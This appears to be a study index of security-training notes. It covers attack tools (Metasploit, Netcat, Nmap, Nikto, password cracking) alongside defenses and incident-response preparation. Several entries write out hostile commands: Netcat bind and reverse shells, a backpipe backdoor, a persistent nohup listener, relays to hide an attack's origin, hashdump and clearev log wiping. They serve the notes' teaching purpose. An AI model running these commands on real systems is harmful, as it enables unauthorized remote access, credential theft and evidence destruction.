  - Disabling keyboard and mouse input
  - Keystroke logging from within the Meterpreter
  - Sniffing from within the Meterpreter
  - Multiple encoders for exploit and payload for IDS evasion
  - Pivoting to use one compromised system to attack other machines
  - Priv module for altering all NTFS timestamps and dumping the SAM database for cracking

Metasploit: Arsenal (Book 3, p. 117):
  Metasploit divides the concepts of exploits, payloads, auxiliary, and post modules
  - An exploit takes advantage of a flaw in a target system
  - The payload makes the target do something the attacker wants
  - Auxiliary modules perform all kinds of tasks, including scanning
  - A post module is used in post-exploitation to plunder targets or manipulate them
  ** New functionality added all the time
  - Useful for all OSes, browsers, apps, etc.

Metasploit: Benefits (Book 3, p. 125):
  Benefits of using the Metasploit Framework for development:
  - Many features already built in simplify development
  - More than a thousand example exploits to learn and copy from
  - After an exploit is developed in the framework, it can use any payload already in the framework
  - If you develop in the framework, your exploit can be popped right into the Metasploit engine

Metasploit: Development (Book 3, p. 124):
  Includes routines used by exploit developers:
  - Payloads
  - Various encoders/decoders for polymorphic code
  - Randomized NOP generator
  - Wrapper for shellcode generation
  Slower development with the advent of bug bounties.

Metasploit: Payload (Book 3, p. 120):
  Many payloads to choose from:
  - Bind shell to current port
  - Bind shell to arbitrary port
  - Reverse shell back to attacker (shoveling shell)
  - Windows VNC Server DLL Inject
  - Inject DLL into running application
  - Create Local Admin user
  All payloads can be exported in many different formats:
  - Macros
  - Executable (Windows, Linux, and mobile devices)
  - Web components
  - Raw C, Perl, and Ruby code

Metasploit: User Interface (Book 3, p. 118):
  Console, command line, and GUI interface
  Select exploit
  - Some exploits include functions to check if the target is vulnerable
  Set target
  Select payload
  - If no payload, the attacker can set a command to execute
  Set options and LAUNCH
Meterpreter (Book 3, p. 121):
  General-purpose module giving the ability to load and interact with DLLs in real time, after exploitation has occurred, and interact across the network with the DLL
  Creates specialized command-line access within a running process
  Windows, Linux, Java, and websites (PHP)

Meterpreter Log File Alterations (Book 5, p. 111):
  The Metasploit Meterpreter also includes a log wiping utility
  - clearev command
  -- Clears all events from the Application, System, and Security logs
  -- No option to specify a particular type of log or event to wipe
  Currently it clears the event logs completely, but could be expanded in the future to line-by-line event log editing

Meterpreter: Features (Book 3, p. 122):
  Meterpreter includes these features:
  - Displays system-related information (OS, user ID, and more)
  - Interact with the file system
  - Interact with the network
  - Interact with processes on the target
  Meterpreter communications utilize TLS
  - Encrypts them, which makes them more difficult to detect

Methods for Dodging SSL Warnings (Book 3, pp. 65, 66, 67):
  Compromise a CA or RA and issue certs
  Bleed the server's keys from memory
  - Dump system memory via malformed heartbeat requests
  - PowerBleed
  Build a bogus cert that has an MD5 hash collision with a trusted cert
  Easier methods include:
  - Compromise the browser and import the attacker's cert as trusted
  - Trick the user into accepting the cert through social engineering: email, pop-ups, or other means
  - Sit in the middle and tell the browser to use HTTP, not HTTPS (the sslstrip tool does this)
  - Attack sites that use SSL only for authentication with cleartext HTTP for the post-authenticated session
  -- The Firesheep and droidsheep tools do this

Microsoft Enhanced Mitigation Experience Toolkit (EMET) (Book 3, p. 126): helps analyze vulnerabilities in third-party software
mimikatz (Book 4, p. 52): Mimikatz is an outstanding tool for extracting clear-text passwords from memory. Can be used with Rubber Duckie
mknod (Book 3, pp. 23, 24, 25):
  mknod backpipe p
  $ /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
modules (Book 5, p. 23): lists loaded modules from the dump, including drivers and SYS files

Monitor the System (Recovery) (Book 1, p. 124): Once the system is back online, continue to monitor for backdoors that escaped detection. Utilize network- and host-based intrusion detection systems and IPS. Carefully check operating system and application logs. If possible, create a custom signature to trigger on the original attack vector, because the attacker will likely try the same thing again.
More Bot Functionality (Book 4, p. 74):
  - Launch packet floods (SYN, HTTP, UDP, etc.)
  - Create HTTP proxy (useful for anonymous surfing)
  - Harvest email addresses
  - Load a plug-in into the bot
  - Shut the computer down
  - Delete bot
  Some versions even look for virtualization
  Some bots can start a GRE (Generic Routing Encapsulation) redirector, so an attacker can send IP packets across a GRE tunnel to an infected system

MP3Stego (Book 5, p. 143): hides data in MPEG files
msfelfscan (Book 3, p. 124): Metasploit module for finding overflow flaws in code
msfpescan (Book 3, p. 124): Metasploit module for finding overflow flaws in code
Msgsnarf (Book 3, p. 51): captures all messages sent via AOL Instant Messenger, ICQ 2000, IRC, MSN Messenger, or Yahoo Messenger chat sessions

MSVenom (Book 3, p. 142):
  Many attackers today are still very focused on 32-bit payloads
  AV vendors are getting pretty good at detecting 32-bit payloads
  64-bit options in Metasploit offer a large number of evasion opportunities
  Let's look at -f exe-only

Multi-Exploit Worms (Book 4, p. 58): A worm uses its exploit warhead to penetrate a computer. Worms are becoming more complex and use several exploits at once. If you've patched against N-1 vulnerabilities, the worm will still get in through hole N
Multiplatform Worms (Book 4, p. 59): worms that are able to attack many OS types, all rolled into a single worm

Name Resolution (Book 3, p. 50):
  On Windows systems there are also a couple of protocols computers will use to resolve the names of other systems:
  - DNS, Link-Local Multicast Name Resolution (LLMNR), and NetBIOS Name Service (NBT-NS)
  Failing DNS, systems will query local systems for a name using LLMNR; failing that, they will use NBT-NS
  Every bit as bad as it sounds; kind of like asking friends for bad directions
  The danger is when a name is not resolvable by DNS
  - Think mistyped domains and hostnames

Nasty payload (Worms) (Book 4, p. 65): In the future, worms will have truly nasty purposes, like gradually destroying host systems or searching the hard drive and stealing sensitive data

nbtstat (Book 1, p. 65):
  Look at NetBIOS over TCP/IP activity
  C:\> nbtstat -S

Nessus (Book 2, p. 117): A very useful tool. A client-server architecture with a large number of plug-ins that measure targets for individual vulnerabilities.
Nessus Architecture (Book 2, p. 118): view slide

Nessus Platform Support (Book 2, p. 119):
  Web-app based vuln scanner, runs an HTML5 server
  Some plug-ins are characterized as "dangerous"
  - May crash the target system because they test the actual attack
  - "Safe Checks" is the GUI option that turns off dangerous plug-ins
  * Defined API for plug-ins, which can be written in C or NASL
  Each plugin is responsible for a single attack and reports to the nessusd server

Nessus Plug-Ins (Book 2, p. 120): One plug-in is in charge of doing one attack and reporting the result to the Nessus server (nessusd). There are over 100,000 plug-ins. Auto-updated every 24 hours.
net session (Book 1, p. 65):
  Look at who has an open session with the machine
  C:\> net session
net session (Book 2, p. 143): lab on page 162
net use (Book 1, p. 65):
  Look at which sessions this machine has opened with other systems
  C:\> net use
net use (Book 2, p. 135): lab on page 162
net view (Book 1, p. 65):
  Look at file shares and make sure each has a defined business purpose
  C:\> net view \\127.0.0.1

Netcat (Book 3, p. 11):
  Focus is on moving raw data between ports on systems
  - ncat, gnu, dnscat, socat, cryptcat, linkcat

Netcat - Switches (Book 3, p. 14):
  nc [options] [target system] [remote port(s)]
  -l: Listen mode (default is client)
  -L: Listen harder (Windows only); makes Netcat a persistent listener
  -u: UDP mode (default is TCP)
  -p: Local port (in server mode, this is the port to listen on; in client mode, this is the source port)
  -- In some nc versions -p means source port only
  -- nc -l -p 8080 (traditional nc) versus nc -l 8080 (gnu style nc)
  -e: Program to execute after connect (useful for backdoors)
  -z: Zero I/O mode (useful for scanning)
  -wN: Timeout for connects, waits for N seconds (useful for scanning)
  -v: Be verbose (print when a connection is made)
  Standard shell redirects:
  >: Dump output to a file
  <: Dump input from a file
  |: Pipe output of first program into second program

Netcat - Backdoors (Book 3, pp. 15, 21):
  Get a login prompt (or other backdoor) at any port, TCP or UDP
  UNIX: nc -l -p [port] -e /bin/bash
  Windows: nc -l -p [port] -e cmd.exe
  Use Netcat in client mode to connect to the backdoor listener:
  nc [listenIP] [port]
  You are logged in as the user that ran Netcat

Netcat - Backpipe (Book 3, pp. 19-21):
  The batch file approach, which works well on Windows:
  - On Windows, create a file called ncrelay.bat containing "nc next_hop 54321"
  - To implement a relay, type nc -l -p 11111 -e ncrelay.bat
  - The -e option can be followed by only one argument, so use a batch file
  The backpipe approach, which works well on Linux and UNIX:
  $ mknod backpipe p
  $ nc -l -p 11111 0<backpipe | nc next_hop 54321 1>backpipe

Netcat - Client Mode (Book 3, p. 12): messages from the tool itself are sent to standard error

Netcat - Connections (Book 3, p. 18):
  Supports source routing, which is useful for spoofing
  Netcat is faster than Telnet
  Easier to drop a connection with Netcat than with Telnet
  Some binary data is interpreted as Telnet option characters; Netcat handles raw data well
  Telnet doesn't support UDP, but Netcat does
Netcat - Data Transfer (Book 3, p. 16):
  Send files between machines
  - You can even use some browsers as the client for option 1
  - Works with TCP or UDP
  - You can even set a source IP address on the listener so that it only accepts connections from one source address
  -- Similar functionality to a TCP wrapper
  Option 1) To move a file from listener back to client:
  listener: nc -l -p [port] < [filename]
  client: nc [listener_ip] [listener_port] > [filename]
  Option 2) To push a file from client to listener:
  listener: nc -l -p [port] > [filename]
  client: nc [listener_ip] [listener_port] < [filename]

Netcat - Listen Mode (Book 3, p. 13):
  - Clients initiate connections
  - Listeners wait for them to arrive

Netcat - Persistent Backdoor Listeners (Book 3, p. 20):
  On Windows, Netcat re-starts listening when invoked with "-L"
  On Linux/UNIX, Netcat can be made persistent in several ways:
  - Schedule a cron job to start Netcat regularly
  - Use a version of Netcat that supports "-L"
  - Use a while loop, as in
    $ while [ 1 ]; do echo "started"; nc -l -p [port] -e /bin/bash; done
  Put that into a shell script called listener.sh, chmod it to readable and executable, and use the nohup command to log out and keep it going:
    $ nohup ./listener.sh &

Netcat - Relays (Book 3, pp. 22, 23):
  Netcat can be configured to relay information from machine to machine to machine
  - Redirect data through ports allowed by firewalls
  - Or use relays to make it harder to trace the true originating point of an attack
  - Rather trivial, but set up Netcat in listener mode and pipe its output through another client-mode instance of Netcat

Netcat - Reverse Shells (Book 3, p. 21):
  You can even "push" a session from client to listener
  - This is sometimes called "shoveling shell"
  - listener: nc -l -p [port]
  - client: nc [listenerIP] [port] -e /bin/sh
  - Then, type commands at the listener
  - The network thinks the connection is outgoing Telnet, HTTP, whatever... It's really an incoming interactive shell

Netcat - Scanning (Book 3, p. 17):
  TCP and UDP port scanning
  nc -v -w3 -z [targetIP] [startport]-[endport]
  -z: option for minimal data to be sent
  -v: tells us when a connection is made; crucial item for a port scanner
  -w3: means wait no more than 3 seconds on each port
  -r: linear scans (default) or random scans (with the -r option)
Netcat - Uses (Book 3, p. 11):
  We discuss some of the many uses for Netcat:
  1) Data transfer (moving files)
  2) Port scanning and vulnerability scanning
  3) Making connections to open ports
  4) Backdoors
  5) Relays

Netcat backdoor w/o -e (Book 3, p. 25):
  mknod backpipe p
  $ /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe

Netcat Defenses (Book 3, p. 26):
  The defense against Netcat depends on the mode in which it is used.
  Preparation step involves:
  - Data transfer: know what is running on your systems
  - Port scanner: close all unused ports
  - Vulnerability scanner: apply system patches
  - Connecting to open ports: close all unused ports
  - Backdoors: know what is running on your systems
  - Relays: carefully architect your network with layered security so an attacker cannot relay around your critical filtering capabilities
  -- Intranet firewalls can help create chokepoints for filtering
  -- Private VLANs (PVLANs) can also help restrict the flow of traffic between systems

Netcat Relays - Methods (Book 3, pp. 23, 24, 25):
  The batch file approach, which works well on Windows:
  - On Windows, create a file called ncrelay.bat containing "nc next_hop 54321"
  - To implement a relay, type nc -l -p 11111 -e ncrelay.bat
  - The -e option can be followed by only one argument, so use a batch file
  The backpipe approach, which works well on Linux and UNIX:
  - mknod backpipe p
  - nc -l -p 1111 0<backpipe | nc next_hop 2222 1>backpipe

Netcat: Backdoors (Book 3, p. 19):
  Get a login prompt (or other backdoor) at any port, TCP or UDP
  UNIX: nc -l -p [port] -e /bin/bash
  Windows: nc -l -p [port] -e cmd.exe
  Use Netcat in client mode to connect to the backdoor listener:
  nc [listenIP] [port]
  You are logged in as the user that ran Netcat

Netcat: Lab (Book 3, p. 42):
  Implement a client-to-client Netcat relay
  First create a listener that the relay shovels the connection to
  - On the outside (attacker's machine), run
    nc -l -p 4444
  On the victim machine, in the prompt with limited privileges, make the client-to-client relay:
    cd
    mknod backpipe p
    nc 127.0.0.1 4444 0<backpipe | nc 127.0.0.1 2222 1>backpipe
  Try it, and type "whoami" in the attacker window
Netcat: Relays (Book 3, p. 22):
  Netcat can be configured to relay information from machine to machine to machine
  - Redirect data through ports allowed by firewalls
  - Or use relays to make it harder to trace the true originating point of an attack
  - Rather trivial, but set up Netcat
  Examples:
  nc -l -p incoming_port | nc target_server outgoing_port
  nc -l -p 1111 | nc endserver 2222

Netcat: Uses (Book 3, p. 15):
  1.) Data transfer (moving files)
  2.) Port scanning and vulnerability scanning
  3.) Making connections to open ports
  4.) Backdoors
  5.) Relays

netscan (Book 5, p. 23): shows all listening UDP and TCP ports and connections
netstat (Book 2, p. 102):
  netstat -nao shows PID
  netstat -na shows which ports are in use
  netstat -nab shows EXE and DLLs used
netstat (Book 5, p. 23): lists open sockets (PID, port, protocol, and when it was opened); shows all active listening UDP and TCP ports and connections
netstat (Linux) (Book 2, p. 104): netstat -nap shows listening ports, PIDs and program names
NetStumbler (Book 2, p. 61): A free war-driving tool for Windows. It can be used to detect 802.11a/b/g interfaces and can tie in GPS data. Noisy: it sends SSID-less probe requests and looks for probe responses, therefore it cannot detect APs that don't respond to such requests!

Network Intelligence & Forensics (Book 5, p. 74):
  Hidden malware can be ID'd by its network usage:
  - Strange port/service pairs, client-client, server-server comms
  - Security Onion: network forensic distro
  Network-level intelligence and forensics can help detect such behavior early
  Auto-detection and throttling via network-based IPS
  - NetWitness, FireEye, Sourcefire, TippingPoint, ForeScout

Network Mapping (Book 2, pp. 79-86):
  An attacker wants to understand the topology of the target network
  The layout of routers and hosts can show vulnerabilities
  NMAP can be used for network mapping and port scanning

Network Mapping - Defenses (Book 2, pp. 86, 87):
  Preparation:
  - You could disable incoming ICMP echo request messages
  -- But your users couldn't ping you
  - You could disable outgoing ICMP Time Exceeded messages
  -- But then your users couldn't traceroute all the way to you
  Identification:
  - IDS signatures looking for ping sweeps or traceroutes
  -- Many false positives possible
  Containment:
  - If you notice a frequent ping sweep you can temporarily block the source address
  - Mark such rules as temporary in a comment field, then purge them on a regular basis (such as monthly)
  Erad, Recov: N/A
Network Mapping: NMAP (Book 2, p. 81):
  Used to determine network topology
  - Internet connectivity: DMZ, perimeter networks
  - Internal network (with access from modem or wireless access point)
  The layout of routers and hosts can show vulnerabilities
  NMAP can be used for network mapping and port scanning
  - Used on both Windows and Linux
  - Zenmap GUI lends itself to network mapping and visualization

Network Perimeter Detection (Example) (Book 1, p. 54): view diagram
NeXpose (Book 2, p. 116): commercial vulnerability scanner
Niksun (Book 2, p. 57): ** Commercial war dialer. Does entire application-layer interaction rebuilding from packet captures; passive and active sniffing
Nikto (Book 2): web server scanner. Looks for default material and well-known server problems. Runs on Unix and Windows.
Nikto IDS Evasion (Book 2): Nikto IDS. Application-level IDS evasion. Nikto morphs this request so that it doesn't match any signatures. It supports ten modes of IDS evasion: 9 at the application layer and 1 at the transport layer. Avoids this command being seen by the IDS:
  GET /cgi-bin/broken.cgi HTTP/1.0

Nikto Authen and Comms (Book 2):
  - Supports web authentication (Basic or NTLM): password guessing attack
  - Grabs and stores any cookies received
  - Supports a proxy, with or without authentication
  - SSL support (using OpenSSL for Unix or ActiveState's Perl/NetSSL for Windows)
  - Extensible via user-defined plugins written in Perl
  - Mutation functionality: sends requests using all combinations of user-defined directories, as well as discovered directories; can generate enormous amounts of traffic

Nikto Features (Book 2):
  - Auto update: updates its own code and grabs the latest vulnerability checks
  - Attempts to determine "ok vs not found" messages for the target
  - Automatically searches for and identifies CGI directories
  - Looks for robots.txt and focuses on pages referred to by this file
  - Simple port scanner: does a 3-way handshake and then determines if a web server is there
  - App-level IDS evasion techniques included

Nikto IDS (Book 2): URL encoding: converts the HTTP request into a different representation by changing ASCII characters into their hexadecimal values and prepending them with a % character.
  - GET /%63%67%69%2d……./broken.cgi HTTP/1.0

NMAP (Book 2, p. 83):
  Nmap sends the following four packets to each address in the target range:
  - ICMP Echo Request
  - TCP SYN to port 443
  - TCP ACK to port 80 (if Nmap is running with UID 0)
  - ICMP Timestamp request
  When running without UID 0, Nmap sends SYN packets to port 80 instead of ACK
  By default NMAP sweeps each target address before port scanning it.

Nmap - OS Fingerprinting (Book 2, pp. 95-96)
NMAP Active OS Fingerprinting (Book 2, p. 96): attempts to determine the operating system of the target by sending various packet types and measuring the response.
NMAP OS Fingerprinting (Book 2, p. 97): 30 different methods are included in 2nd generation fingerprinting, including TCP ISN, TCP IP ID, ICMP IP ID, TCP initial window size
NMAP Scan Types (Book 2, p. 94): NMAP allows for conducting numerous types of scans: ping sweeps, ARP scans, Connect scans, SYN scans, FIN scans, etc.
Nmap Scan Types (Book 2, pp. 93-94)
NMAP-ACK Scanning (Book 2, p. 95): Blocks session initiations from the outside. Useful for mapping, but not for port scanning. Great for finding sensitive internal systems post exploitation
No free bugs (Book 2, p. 9): Movement started by researchers where they discussed a policy in which they try to get paid for vulnerabilities they discover.
nohup (Book 3, p. 20): The attacker can invoke this loop in the background by using the nohup command, as follows:
  $ nohup ./listener.sh &

NT Hashes (Book 4, p. 19):
  NT hash authentication is better, but not great
  - Uppercase/lowercase are preserved (thankfully)
  - Password is hashed using MD4 to create a 16-byte hash
  - If the password is greater than 14 characters, no LANMAN hash is stored (that's 15 or more characters)
  For both LANMAN and NT hashes, no salts are used
  - You can precompute a dictionary of hashed passwords

Obtaining the Password Hashes (Cain) (Book 4, pp. 29, 30):
  Can be obtained by:
  - Dump hashes from the Domain Controller (admin)
  - Use Cain, Abel, or pwdump tools
  - Fizzgig's fgdump, which shuts down AV tools
  - Use Metasploit Meterpreter's hashdump script to pull them from memory or the hashdump command to pull them from the registry
    * meterpreter> hashdump      <---- pulls from memory
    * meterpreter> run hashdump  <---- pulls from registry
  If not the admin:
  - Boot into another OS and copy the SAM
  - Obtain a copy from c:\windows\repair or the backup directory
  - Obtain a copy from a tape or emergency repair disk
  - Sniff passwords off the network using Cain's sniffers
  -- Useful for LANMAN Challenge/Response, NTLMv1, NTLMv3 or Kerberos pre-auth

Open Web Application Security Project (OWASP) (Book 4, p. 82):
  OWASP offers numerous useful items:
  - Guide to Building Secure Web Apps and Web Services
  - Web app pen test framework
  - WebGoat: a buggy web app, ready for you to test
  - User input validation code, including filters in PHP, Java, and as regular expressions
  - ZAP: web app vuln scanner

OpenPuff (Book 5, p. 144):
  Great support for images, audio, video and Flash/Adobe files
  - Multi-password support
  - Plausible deniability
  - Multiple rounds of encryption with different algorithms
Open-Source Information (Book 2, p. 30): see page
OpenStego (Book 5, p. 144): embeds data and digital watermarks into images
OpenVAS (Book 2, p. 116): a fork of the previous free, open-source version of Nessus 2. Vulnerability scanner
OSSEC (Book 5, p. 73): file integrity checker. Runs on Linux, Mac OS X, and Windows
Other Unusual Items (Windows Cheat Sheet) (Book 1, p. 75): The cheat sheets remind the system admin to look at the performance monitoring tool associated with the Task Manager.
P0F (Book 2): Passive sniffer that has a 90% success rate. Determines the OS based on TCP, UDP and ICMP headers. Estimates distance based on TTL. Everything behind the proxy looks like the proxy.
Pacdoor (Book 3, p. 74): tool used to attack WPAD and intercept traffic

Packers (Book 5, p. 19):
  For thwarting Windows reverse engineering of malicious code
  Originally focused on compression
  - Gives the attacker more obscurity
  UPX (most popular), Yoda, Themida, Exe32pack
  Commercial ones as well (Thinstall, PECompact, PEBundle, etc.)

Packet Filtering (Book 2): looks at a single packet to make a filtering decision. Packets are forwarded through the device
packing (Book 5, p. 19): compressing a bloated executable to make it smaller for distribution
PAM (Book 4, p. 41):
  Pluggable Authentication Modules (PAM)
  Can link UNIX login to various systems:
  - RADIUS, Kerberos, and more
  Can enforce password complexity

Pass the Hash: Tools (Book 4, p. 52):
  Windows Credential Editor (WCE), improved version for Vista+
  Modified Samba code allows mounting of the file system (Win/Linux)
  Metasploit psexec module (Linux)
  Mimikatz is an outstanding tool for extracting clear-text passwords from memory

Pass the Hash - Attacks (Book 4, p. 50):
  Use the hashes to authenticate without cracking
  A type of attack that allows the attacker to use the stolen hashes to authenticate to a target machine without cracking
  - Windows LSASS (LANMAN Challenge/Response, NTLMv1 and NTLMv2) authenticates from hashes

Pass the Hash - Defense (Book 4, p. 53):
  Preparation: maintain control of hashes:
  - Patch systems
  - Harden machines
  - Use endpoint security suites
  - Block client-to-client connections; allow SMB to clients from admin only
  - Unique or pseudo-random local admin password for each system
  Identification: look for unusual admin activity on a machine:
  - Configuration changes, and so on
  - Look for unusual machine-to-machine connections
  Containment, Eradication, Recovery:
  - Change passwords immediately

Passive OS Fingerprinting Def (Book 2):
  - Close all unused ports
  - Utilize stateful packet filters and proxy firewalls
Password  4  5  User passwords need to be protected against:
  --Unauthorized disclosure, unauthorized modification, and unauthorized removal.
  Solution: Store only encrypted or hashed passwords
  --Often called password representations. Windows stores them locally in the SAM database and remotely in Active Directory; modern Linux systems typically store them in the /etc/shadow file.
Password Complexity  4  33  Windows password complexity enforced with Group Policy in AD
  --Password length is more important than complexity
  Active Directory Users and Computers MMC snap-in:
  Group Policy Object Policy\Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy
  --Enable the "Passwords must meet complexity requirements of installed password filter" setting.
  Local Security Policy snap-in from Administrative Tools (standalone):
  --Security Settings\Account Policies\Password Policy
  --Enable the "Passwords must meet complexity requirements of installed password filter" setting.
Password Cracking for Good Purposes (Password Cracking)  4  14  Recovering forgotten or unknown passwords
  Audit the strength of passwords
  *Internal employees who are suspects could claim that you had their passwords and have therefore framed them
  --Use l0phtcrack auditing mode!!
Password Cracking: Hybrid Attacks  4  13  Start with a dictionary
  Concatenate items (numbers, letters) to the dictionary words
  More advanced hybrid attacks:
  --Shave characters off the dictionary term
  --Make "leet" speak substitutions in dictionary terms
  Sometimes referred to as word mangling
  John the Ripper includes fantastic word-mangling rules for determining potential passwords
Password Cracking: Rainbow Tables  4  22  You can create encrypted/hashed password representations in advance
  Project RainbowCrack provides software and free tables
  The Free Rainbow Tables project provides free tables and lookup tools
  Other projects crack other types of hashing/crypto algorithms
  This feature is also supported in Cain, a tool with a great deal of functionality, including cracking Windows passwords
Password Spraying Example  2  138  See screenshot
Password: Cracking  4  9  Determining a password when you have only the password file with cipher-text password representations:
  --Find valid user ID
  --Find encryption algorithm used
  --Obtain encrypted password
  --Create list of possible passwords
  --Encrypt each password
  --See if there is a match
Password: Cracking Methods  4  10  Dictionary attack: Using a word list
  Brute force attack: Iterating through character sets
  Hybrid attack: A mix of the two, sometimes called word mangling
  Tools such as: Cain and Abel, John the Ripper, Hashcat
Password: Guessing  4  6  Find valid user ID, create list of possible passwords, try typing in each password; if the system allows you in, success; if not, try again. You can also use a script or automated tool to improve speed and accuracy.
Password: Spraying  4  7  Useful technique when lockout is a concern
  --Try a small number of potential passwords against a large number of accounts on a large number of target machines
  --Choose common words, such as city names, company names, product names, and local sports teams
  --Choose names based on password reset intervals
  --An amazingly effective technique
Password: Unix/Linux  4  36  see page
Patents  1  180  Protect inventions and innovations
PaX  3  126  Non-executable system stack, Linux, protects against buffer overflow
pedump  5  23  Dumps code associated with running process into executable file
Phishme  1  20  Phishme is an excellent way to create phishing campaigns and track the results
Physical Access Attacks  3  4, 5  Focus on having direct access to a system. Think stolen laptop.
  Common tools include:
  Kon-boot: USB boot attack where any password is accepted as a correct password.
  Inception: Unlocking a powered-on and locked computer via DMA over FireWire/Thunderbolt connections; great for gaining access to systems with hard drive encryption.
  Lanturtle+Responder: USB attack where a malicious USB Ethernet adapter causes a system to generate DNS requests and Responder can capture hashes
  Rubber duckie: HIDs that look like mass storage but are actually automatic keyboards (really fast keyboards)
Physical Access Defenses  3  6  The key is to train users to protect their systems when they are not in their possession.
  Use full-disk encryption
  Restrict access to USB ports
  Password-protect BIOS, and disable USB boot
  Disable LLMNR
Ping sweeps  2  94  Send a variety of packet types (including ICMP Echo Requests, but many others as well).
PingChat  5  128  reference
Poison Ivy  5  14  Remote-control backdoor GUI tool
Polymorphic code  4  64  Take binary instructions (compiled code), XOR it with a random key, attach a decoder, PUSH DATA and then POP into REGISTER
pop  3  149  Take it off the top of the stack
Port Scanners  2  89  Port scanners are a must for any attacker's toolbox
  They help identify openings on a system and the type of system
  Most Internet applications use TCP or UDP
Port Scanning  2  87-104
Port Scanning - Defenses  2  101  Preparation:
  --Close all unused ports by shutting off services and applying filters
  --Utilize stateful packet filters and/or proxy firewalls
  --Utilize an intrusion detection system
  Identification:
  --Several IDS signatures for port scans
  --Log analysis shows pesky connection attempts
  --Netstat, TCPView, WMIC
  Cont, Erad, Recov: N/A
Positive Skew Analysis  1  139  Enterprise-wide IR, PowerShell
PowerBleed  3  65  Builds a bogus cert that has an MD5 hash collision with a trusted cert
PowerShell Empire - SMB Sessions  2  139  Exploits the strength of PowerShell to conduct enumeration across the net
  --Can map domain trusts, group membership, port scan and conduct reverse DNS lookups
PowerShell Tools Enterprise-Wide IR  1  139  Kansa focuses on stacking like systems against each other to provide a ranked listing of processes, network connections, and configurations of systems
  This is part of statistical long-tail analysis (positive skew)
Preparation - Building a Team  1  30  A multi-disciplinary team is best.
  Security (computer and physical)
  -Incident handler(s), forensics analyst, malware analyst
  Operations (system administrator)
  Network management
  Legal Counsel
  Human Resources
  Public affairs/Public relations
  Disaster Recovery/Business Continuity Planning
  Union representation (if you are a union shop)
Preparation - Checklists and Team Issues  1  31  Prepare a standard baseline for each type of system in the org.
  Get an image for comparison during the incident analysis phase
Preparation - Command Post Team  1  32  The command post needs to be identified in advance
  -Should have multiple comms bands
Preparation - Cultivate Relationships  1  38  Coordinate closely with help desks
  -Help desk personnel are often the incident handler's initial eyes and ears
  **System administrators and network administrators
  -Involve system administrators in your team
  *Trust your experienced admins' sense of things that "just aren't right"
  -Encourage regular system backups by sys admins
  -Invest in your help desk with regular training
Preparation - Getting System Access  1  34  Team needs controlled access to computing resources.
  --May or may not involve sysadmin
  -Need passwords and crypto keys available
  --Be nice; always notify before logging into a system
Preparation - Interface with Law Enforcement  1  25  Interface with law enforcement
  -Develop interfaces with law enforcement agencies
  -Know the types of cases that interest them
  --Join InfraGard, High Technology Crime Investigation Association (HTCIA), Electronic Crimes Task Force (ECTF)
  Report to federal/state/local. Starting at the bottom and working your way up is a good strategy.
Preparation - Management Support  1  29  Develop management support for an incident-handling capability
  -Monthly or quarterly reports
  -Graphically illustrate an incident you faced
  -Show jump-off points used in your network; collect historical support
Preparation - Notifying Law Enforcement  1  23  You may need to notify the public if PII or PHI is breached
  --45 states have breach disclosure legislation
  --Threat to public safety or substantial impact to a 3rd party
  Reasons to notify law enforcement: benefit from criminal discovery and be a good corporate citizen
  Reasons for not notifying law enforcement:
  -Control: There are suddenly two cases
  -Different goals (prosecution vs. quickly resuming business)
  **Publicity, risk of continued hacking, risk of equipment seizure and/or interruption to business (while backups are made)
Preparation - Peer Notification  1  26  Establish a policy for outside "peer" notification
  --Incidents involving remote computers belonging to business partners and joint ventures
  **For VPN usage, include a warning banner
Preparation - People  1  20  One of the most overlooked aspects of our security posture. Also, the most easily attacked:
  --Via targeted e-mail (spear phishing)
  --Via calls (social engineering)
  Recurring training can be a big help. Annual training tends to be ineffective; constant reinforcement; SANS Securing the Human.
  You can also regularly test your users with social-engineering calls and phishing tests.
  Caller ID spoofing is a good test to employ. Phishing frameworks, such as sptoolkit and Phishme.
Preparation - POC and Resources  1  35  Establish a primary point of contact and an incident command communications center.
  --Be prepared to establish secured communications.
  **Get permission in advance to rapidly deploy resources ($$, etc.)
Preparation - Policy  1  22  Establish an organizational approach to incident handling.
  -Decide generally how you will handle the "big issues" upfront
  -Maintain secrecy or notify law enforcement
  -Contain and clear or watch and learn
  -Get management buy-in and signoff of your default practices
  -Document any purposeful deviations from your standard practice when you opt to do so
  **Make these decisions before any incident occurs
Preparation - Reporting Facilities  1  36  Provide an outlet to encourage reporting of suspicious activity
  --Reward employees for reporting and publish bulletins that outline findings
Preparation - Take Notes  1  27  Remain calm. Even a fairly mild incident tends to cause stress.
  -Do not hurry; mistakes can be very costly. Answer the 5 W's and How.
  -Notes, logs and other evidence are crucial.
  -Hand-written notes can be a big help; never rip out pages
  -Judges and juries resonate with them
  -The attacker cannot steal them from your machine or destroy them
  **Include date/time; a recorder or camera may be very useful
Preparation - Train the Team  1  37  Train all the time!! Reduce stress through preparation
  -Set up tools and techniques training
  -Consider deploying an internal honeypot for analysis
  -Stock some high-capacity drives and practice forensics imaging
  -(Advanced) Conduct war games
  *Conduct a penetration test unannounced and see how your team responds
Preparation - Jump Bag  1  40  Get a duffle bag and keep it stocked with items for incident handling.
  Don't steal from your own jump bag (always have it ready to roll)
  Fresh media for holding file system images
  CDs, USBs, and an extra high-capacity hard drive
Preparation - Emergency Comms  1  33  Create phone tree with established procedures
  -Have a conference bridge number on standby
  -Print and laminate contact info
  **Test your call list
Preparation Overview  1  19  The goal of the Preparation phase is to get the team ready to handle incidents
procmemdump  5  23  Dumps the memory of a particular process chosen by the Rekall user. Instead of looking through all of memory, the analysis can focus on just this given process
Program Execution  3  100  SEE SLIDE
Protocol Layering Review  3  47  Application: (Web Surfing, Telnet, FTP)
  Transport Layer: (TCP or UDP)
  Network Layer: (IP)
  Data Link Layer: (Ethernet Firmware, MAC Address)
  Physical Layer: (Ethernet Card, Wire)
Protocol Parser Buffer Overflows  3  137  Flaws in these protocol parsers let the attackers get the privileges of the vulnerable program
  -Often, these programs run with root or system privileges
  -They can grab packets in promiscuous mode, and/or
  -They can attach to a port number less than 1024 on UNIX, and/or
  -Because they involve system-level functionality
  Admin users sometimes run protocol parsers to look at delayed captured data
  -Attackers can get admin privileges on the network admin's machine
Protocol Parsers Problems  3  136  Protocol parsers are particular problem areas
  -Grab data from the network and parse it for an application
  -The code breaking data down into component fields is often ripe with buffer overflow vulnerabilities
Proxy - Web App Manipulation  4  138  The proxy enables the attacker to edit the raw HTTP or HTTPS, including non-persistent cookies
  -Account numbers, balances, shopping cart price
  ZAP Proxy, Burp Proxy, w3af, and Fiddler
